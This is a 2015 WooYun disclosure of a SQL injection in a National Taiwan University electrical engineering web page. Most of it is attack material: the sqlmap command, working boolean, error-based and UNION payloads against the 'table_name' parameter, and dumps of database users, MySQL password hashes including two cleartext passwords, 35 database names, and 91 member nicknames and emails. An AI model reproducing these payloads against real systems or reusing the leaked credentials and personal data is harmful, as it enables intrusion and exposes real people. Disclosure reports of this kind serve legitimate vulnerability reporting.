当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149922

漏洞标题:国立台湾大学电机工程学系某处存在sql注入漏洞(DBA权限/root密码泄露/35个库/大量用户信息泄露)(臺灣地區)

相关厂商:国立台湾大学

漏洞作者: 路人甲

提交时间:2015-10-28 10:46

修复时间:2015-12-12 20:12

公开时间:2015-12-12 20:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-28: 细节已通知厂商并且等待厂商处理中
2015-10-28: 厂商已经确认,细节仅向厂商公开
2015-11-07: 细节向核心白帽子及相关领域专家公开
2015-11-17: 细节向普通白帽子公开
2015-11-27: 细节向实习白帽子公开
2015-12-12: 细节向公众公开

简要描述:

国立台湾大学电机工程学系某处存在sql注入漏洞(DBA权限/root密码泄露/35个库/大量用户信息泄露)

详细说明:

测试地址:http://**.**.**.**/news_fullpage.php?pattern=0&table_name=congratulation

python sqlmap.py -u "http://**.**.**.**/news_fullpage.php?pattern=0&table_name=congratulation" -p table_name --technique=BEU --random-agent --batch -D nslab -T member -C id,nickname,email --dump

漏洞证明:

---
Parameter: table_name (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: pattern=0&table_name=congratulation WHERE 8702=8702 AND 4513=4513#
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: pattern=0&table_name=congratulation WHERE 9146=9146 AND (SELECT 1680 FROM(SELECT COUNT(*),CONCAT(0x71707a7071,(SELECT (ELT(1680=1680,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- 
    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: pattern=0&table_name=congratulation WHERE 7405=7405 UNION ALL SELECT NULL,CONCAT(0x71707a7071,0x784c4c53716861764a4768615473477a764c65445967546e4a44646d626e6b446e776b4b57506e6e,0x7171717671),NULL,NULL,NULL,NULL#
---
web server operating system: FreeBSD
web application technology: Apache 2.2.22, PHP 5.3.14
back-end DBMS: MySQL 5.0
current user:    'nslab@localhost'
current user is DBA:    True
database management system users [34]:
[*] 'bltemp'@'%'
[*] 'bltemp'@'**.**.**.**'
[*] 'bltemp'@'**.**.**.**'
[*] 'bltemp'@'**.**.**.**'
[*] 'bltemp'@'localhost'
[*] 'bltemp'@'**.**.**.**'
[*] 'bltemp'@'**.**.**.**'
[*] 'bltemp'@'**.**.**.**'
[*] 'bltemp1'@'**.**.**.**'
[*] 'cmchen'@'%'
[*] 'cmchen_blog'@'localhost'
[*] 'golo'@'%'
[*] 'huangty'@'%'
[*] 'huangty'@'localhost'
[*] 'mllu'@'%'
[*] 'mrbs'@'%'
[*] 'nslab'@'%'
[*] 'nslab'@'**.**.**.**'
[*] 'nslab'@'localhost'
[*] 'nslab'@'**.**.**.**'
[*] 'nslab'@'**.**.**.**'
[*] 'pp2011'@'%'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'SIGCOMM2012TG'@'**.**.**.**'
[*] 'SIGCOMM2012TG'@'localhost'
[*] 'SIGCOMM2012TG'@'localhost.localdomain'
[*] 'SIGCOMM2012TG'@'**.**.**.**'
[*] 'SIGCOMM2012TG'@'**.**.**.**'
[*] 'SIGCOMM2013TG'@'**.**.**.**'
[*] 'SIGCOMM2013TG'@'localhost'
[*] 'SIGCOMM2013TG'@'localhost.localdomain'
[*] 'YuShanNet'@'%'
database management system users password hashes:
[*] bltemp [1]:
    password hash: *CD7AEBC023809DFACC782F3C302B004E14200CFC
[*] bltemp1 [1]:
    password hash: *CD7AEBC023809DFACC782F3C302B004E14200CFC
[*] cmchen [1]:
    password hash: *1DDF4D6AA65CCED4FB1660037450BDF6AA7F5FE6
[*] cmchen_blog [1]:
    password hash: *3E93B93CDABCB5FC8CA9C771FA08173B204C9E95
[*] golo [1]:
    password hash: *B75EC3115810159A249E1B0D5269CC618ECB39B2
[*] huangty [1]:
    password hash: *853BC447D8603E6A7F834BEA8358270429942DB1
[*] mllu [1]:
    password hash: *7882622239ED80F6E6AA6A7D941886BFB547CA51
[*] mrbs [1]:
    password hash: *853BC447D8603E6A7F834BEA8358270429942DB1
[*] nslab [2]:
    password hash: *C65421FCAD27D82431A17FDCD19D933BFE398FA1
    password hash: *CD7AEBC023809DFACC782F3C302B004E14200CFC
[*] pp2011 [1]:
    password hash: *D51F49DDA0D183B925A65C6153FE963954FFC4C8
[*] root [1]:
    password hash: *BE7F69DBAD4D0F984CD4AA240408143837507D09
[*] SIGCOMM2012TG [1]:
    password hash: *82DE7C0C710D898C4F5FF91FA279C6E2E7FDCE5B
    clear-text password: SIGCOMM2012TG
[*] SIGCOMM2013TG [1]:
    password hash: *D979C0C9811A6144A3F42BF1AD9F6166697A38C7
    clear-text password: SIGCOMM2013TG
[*] YuShanNet [1]:
    password hash: *CD7AEBC023809DFACC782F3C302B004E14200CFC
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: table_name (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: pattern=0&table_name=congratulation WHERE 8702=8702 AND 4513=4513#
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: pattern=0&table_name=congratulation WHERE 9146=9146 AND (SELECT 1680 FROM(SELECT COUNT(*),CONCAT(0x71707a7071,(SELECT (ELT(1680=1680,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- 
    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: pattern=0&table_name=congratulation WHERE 7405=7405 UNION ALL SELECT NULL,CONCAT(0x71707a7071,0x784c4c53716861764a4768615473477a764c65445967546e4a44646d626e6b446e776b4b57506e6e,0x7171717671),NULL,NULL,NULL,NULL#
---
web server operating system: FreeBSD
web application technology: Apache 2.2.22, PHP 5.3.14
back-end DBMS: MySQL 5.0
available databases [35]:
[*] articles
[*] biosensor
[*] biosensor_publication
[*] bltemp
[*] calendar
[*] cmchen
[*] cmchen_account
[*] cmchen_blog
[*] deaf
[*] huangty
[*] information_schema
[*] iSpace
[*] jane
[*] jinzora
[*] magnetic
[*] MHCI
[*] mllu
[*] MPP_GUIBoys
[*] mrbs
[*] mysql
[*] news
[*] nslab
[*] nslabboard
[*] papers
[*] performance_schema
[*] pp2011
[*] publication
[*] resource
[*] scholarship
[*] SIGCOMM2012TG
[*] SIGCOMM2013TG
[*] Skyqe
[*] test
[*] wordpress
[*] YuShanNet
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: table_name (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: pattern=0&table_name=congratulation WHERE 8702=8702 AND 4513=4513#
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: pattern=0&table_name=congratulation WHERE 9146=9146 AND (SELECT 1680 FROM(SELECT COUNT(*),CONCAT(0x71707a7071,(SELECT (ELT(1680=1680,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- 
    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: pattern=0&table_name=congratulation WHERE 7405=7405 UNION ALL SELECT NULL,CONCAT(0x71707a7071,0x784c4c53716861764a4768615473477a764c65445967546e4a44646d626e6b446e776b4b57506e6e,0x7171717671),NULL,NULL,NULL,NULL#
---
web server operating system: FreeBSD
web application technology: Apache 2.2.22, PHP 5.3.14
back-end DBMS: MySQL 5.0
Database: nslab
[44 tables]
+----------------------------+
| BLelevator                 |
| 2004_Fall_LabFunTime       |
| 2005_Fall_LabFunTime       |
| 2005_Summer_LabFunTime     |
| 2005_Summer_NetworkSeminar |
| 2006_Fall_LabFunTime       |
| 2006_Fall_NetworkSeminar   |
| 2006_Fall_OESeminar        |
| 2006_Spring_LabFunTime     |
| 2006_Spring_NetworkSeminar |
| 2007_Fall_LabFunTime       |
| 2007_Fall_NetworkSeminar   |
| 2007_Spring_LabFunTime     |
| 2007_Spring_NetworkSeminar |
| 2007_Spring_OESeminar      |
| 2008_Fall_LabFunTime       |
| 2008_Fall_NetworkSeminar   |
| 2008_Spring_LabFunTime     |
| 2008_Spring_NetworkSeminar |
| 2009_Fall_LabFunTime       |
| 2009_Fall_NetworkSeminar   |
| 2009_Spring_LabFunTime     |
| 2009_Spring_NetworkSeminar |
| 2010_Fall_LabFunTime       |
| 2010_Fall_NetworkSeminar   |
| 2010_Spring_LabFunTime     |
| 2010_Spring_NetworkSeminar |
| 2011_Fall_LabFunTime       |
| 2011_Fall_NetworkSeminar   |
| 2011_Spring_LabFunTime     |
| 2011_Spring_NetworkSeminar |
| 2012_Fall_LabFunTime       |
| 2012_Fall_NetworkSeminar   |
| 2012_Spring_LabFunTime     |
| 2012_Spring_NetworkSeminar |
| 2013_Spring_LabFunTime     |
| 2013_Spring_NetworkSeminar |
| announcement               |
| member                     |
| property                   |
| property2                  |
| property_log               |
| publication                |
| test                       |
+----------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: table_name (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: pattern=0&table_name=congratulation WHERE 8702=8702 AND 4513=4513#
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: pattern=0&table_name=congratulation WHERE 9146=9146 AND (SELECT 1680 FROM(SELECT COUNT(*),CONCAT(0x71707a7071,(SELECT (ELT(1680=1680,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- 
    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: pattern=0&table_name=congratulation WHERE 7405=7405 UNION ALL SELECT NULL,CONCAT(0x71707a7071,0x784c4c53716861764a4768615473477a764c65445967546e4a44646d626e6b446e776b4b57506e6e,0x7171717671),NULL,NULL,NULL,NULL#
---
web server operating system: FreeBSD
web application technology: Apache 2.2.22, PHP 5.3.14
back-end DBMS: MySQL 5.0
Database: nslab
Table: member
[12 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| affiliation | varchar(100) |
| Chinese     | varchar(64)  |
| degree      | varchar(30)  |
| email       | varchar(32)  |
| English     | varchar(16)  |
| gradyear    | varchar(30)  |
| id          | int(11)      |
| location    | char(1)      |
| nickname    | varchar(16)  |
| showup      | char(1)      |
| type        | varchar(16)  |
| url         | varchar(100) |
+-------------+--------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: table_name (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: pattern=0&table_name=congratulation WHERE 8702=8702 AND 4513=4513#
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: pattern=0&table_name=congratulation WHERE 9146=9146 AND (SELECT 1680 FROM(SELECT COUNT(*),CONCAT(0x71707a7071,(SELECT (ELT(1680=1680,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- 
    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: pattern=0&table_name=congratulation WHERE 7405=7405 UNION ALL SELECT NULL,CONCAT(0x71707a7071,0x784c4c53716861764a4768615473477a764c65445967546e4a44646d626e6b446e776b4b57506e6e,0x7171717671),NULL,NULL,NULL,NULL#
---
web server operating system: FreeBSD
web application technology: Apache 2.2.22, PHP 5.3.14
back-end DBMS: MySQL 5.0
Database: nslab
Table: property_log
[6 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| holder     | varchar(100) |
| id         | int(11)      |
| logDate    | text         |
| objCode    | text         |
| object     | text         |
| pre_holder | varchar(100) |
+------------+--------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: table_name (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: pattern=0&table_name=congratulation WHERE 8702=8702 AND 4513=4513#
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: pattern=0&table_name=congratulation WHERE 9146=9146 AND (SELECT 1680 FROM(SELECT COUNT(*),CONCAT(0x71707a7071,(SELECT (ELT(1680=1680,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- 
    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: pattern=0&table_name=congratulation WHERE 7405=7405 UNION ALL SELECT NULL,CONCAT(0x71707a7071,0x784c4c53716861764a4768615473477a764c65445967546e4a44646d626e6b446e776b4b57506e6e,0x7171717671),NULL,NULL,NULL,NULL#
---
web server operating system: FreeBSD
web application technology: Apache 2.2.22, PHP 5.3.14
back-end DBMS: MySQL 5.0
Database: nslab
Table: member
[91 entries]
+----+-------------+---------------------------------+
| id | nickname    | email                           |
+----+-------------+---------------------------------+
| 1  | Polly       | pollyhuang at **.**.**.**        |
| 2  | Abon        | r94921033 at **.**.**.**         |
| 3  | Ahey        | b91901152 at **.**.**.**         |
| 4  | Cheng-Ying  | Cheng-Ying.png                  |
| 5  | Chih-Ying   | za950112 at **.**.**.**        |
| 6  | David       | r92921091 at **.**.**.**         |
| 7  | Elaine      | elaine.png                      |
| 8  | Han         | b90901046 at **.**.**.**         |
| 9  | Ivan        | r94921042 at **.**.**.**         |
| 41 | Jeffrey     | d94921013 at **.**.**.**         |
| 79 | Kun-chan    | klan at csie ncku edu tw        |
| 11 | Jerry       | r93922115 at **.**.**.**         |
| 12 | Marc        | r94921030 at **.**.**.**         |
| 13 | Matthew     | r93921029 at **.**.**.**         |
| 14 | Ming-Tsang  | r93064 at csie.**.**.**.**       |
| 15 | Monpig      | monmonpig at **.**.**.**      |
| 16 | Stephan     | r92921106 at **.**.**.**         |
| 17 | Steve       | b89117 at csie.**.**.**.**       |
| 18 | Steven      | r93921100 at **.**.**.**         |
| 19 | S.Y.        | sylau at **.**.**.**             |
| 20 | Tim         | r93921093 at **.**.**.**         |
| 21 | Tylor       | r93921046 at **.**.**.**         |
| 22 | Yu-Chi      | b92901063 at **.**.**.**         |
| 23 | James       | b89901097 at **.**.**.**         |
| 24 | Nelson      | chuncn at cpsc.ucalgary.ca      |
| 25 | Jimmy       | cmchen.png                      |
| 26 | Te-Yuan     | huangty.png                     |
| 28 | Sheng-Wei   | swc at **.**.**.**        |
| 32 | Ling-Jyh    | cclljj at **.**.**.**     |
| 29 | Patrick     | b91901044 at **.**.**.**         |
| 30 | Ben         | b92901139 at **.**.**.**         |
| 31 | Junction    | b92901134 at **.**.**.**         |
| 27 | Hao         | hchu at csie.**.**.**.**         |
| 34 | Ming-Tsang  | r93064 at csie.**.**.**.**       |
| 35 | Jerry       | r93922115 at **.**.**.**         |
| 36 | Steve       | r96942034 at **.**.**.**         |
| 37 | Justin      | j.huang.1985 at **.**.**.**       |
| 38 | Eugene      | eugene7505 at **.**.**.**       |
| 39 | K.M.        | olddu at **.**.**.**            |
| 40 | Mike        | michael.eckl at **.**.**.**       |
| 42 | Vincent     | r97921035 at **.**.**.**         |
| 43 | Pang-Yen    | eisscholle at **.**.**.**           |
| 44 | Yung-Chieh  | b94901126 at **.**.**.**         |
| 45 | Hsu-Chieh   | <blank>                         |
| 46 | Yi-En       | <blank>                         |
| 47 | Ian         | <blank>                         |
| 48 | Lawrence    | powerstar1009 at **.**.**.**      |
| 49 | Steven      | stevensyy at **.**.**.**       |
| 50 | Susan       | s8800266 at **.**.**.**        |
| 51 | David       | david213-redmond at **.**.**.** |
| 52 | Andrea      | stupidandrea at **.**.**.**       |
| 53 | Jason       | JASON8877 at MSN.COM            |
| 54 | James       | jameslee2007tw at **.**.**.**     |
| 55 | Nicky       | b95901189 at **.**.**.**         |
| 56 | Helen       | featherchao33 at **.**.**.**        |
| 57 | Brian       | boyan152 at **.**.**.**           |
| 58 | Omni        | potence at **.**.**.**        |
| 59 | Piggy       | r99921035 at **.**.**.**         |
| 60 | Annie       | anniechiu92 at **.**.**.**        |
| 61 | Lisa        | lisahsu24 at **.**.**.**       |
| 62 | Emily       | emily750120 at **.**.**.**      |
| 63 | ColdCatCola | b94901148 at **.**.**.**         |
| 64 | Yetta       | ja7656 at **.**.**.**           |
| 65 | Louwang     | samuelwang22 at **.**.**.**       |
| 66 | Sean        | r98921040 at **.**.**.**         |
| 67 | Jason       | jason5tw2001 at **.**.**.**     |
| 68 | Junction    | b92901134 at **.**.**.**         |
| 69 | Justin      | j.huang.1985 at **.**.**.**       |
| 71 | Sowhat      | sowhat.1055 at **.**.**.**        |
| 75 | Chloe       | existence124315 at **.**.**.**    |
| 74 | Nancy       | nliao0112 at **.**.**.**          |
| 76 | Jiang-Jiang | jiangjiau at **.**.**.**          |
| 77 | Tina        | rabbiturtle9 at **.**.**.**       |
| 78 | CT          | iwchiao at **.**.**.**            |
| 80 | Johnsen     | jk05r at ecs.soton.ac.uk        |
| 81 | XiaoHong    | kingsmallred at **.**.**.**     |
| 82 | Archiang    | borchiang at **.**.**.**        |
| 83 | Twohsien    | mich5782 at **.**.**.**        |
| 84 | Kcir        | b94902067 at **.**.**.**         |
| 85 | Yuting      | b95202002 at **.**.**.**         |
| 86 | MengLin     | r00921037 at **.**.**.**         |
| 87 | Vishwesh    | vvk215 at **.**.**.**             |
| 88 | TsungYun    | dj184dja8 at **.**.**.**          |
| 90 | YangChun    | tukishimaaoba at gmail com      |
| 91 | ChiaChih    | a101112141 at **.**.**.**         |
| 92 | Piggy       | r99921035 at **.**.**.**         |
| 93 | SY          | sylau at **.**.**.**             |
| 94 | Ted         | tedlai at csie.**.**.**.**       |
| 95 | Ronald      | ronaldvongola at **.**.**.**      |
| 96 | Jane        | b99901079@**.**.**.**            |
| 97 | Chi-Yun Wu  | b99901138 at **.**.**.**         |
+----+-------------+---------------------------------+

修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-10-28 20:11

厂商回复:

感謝通報

最新状态:

暂无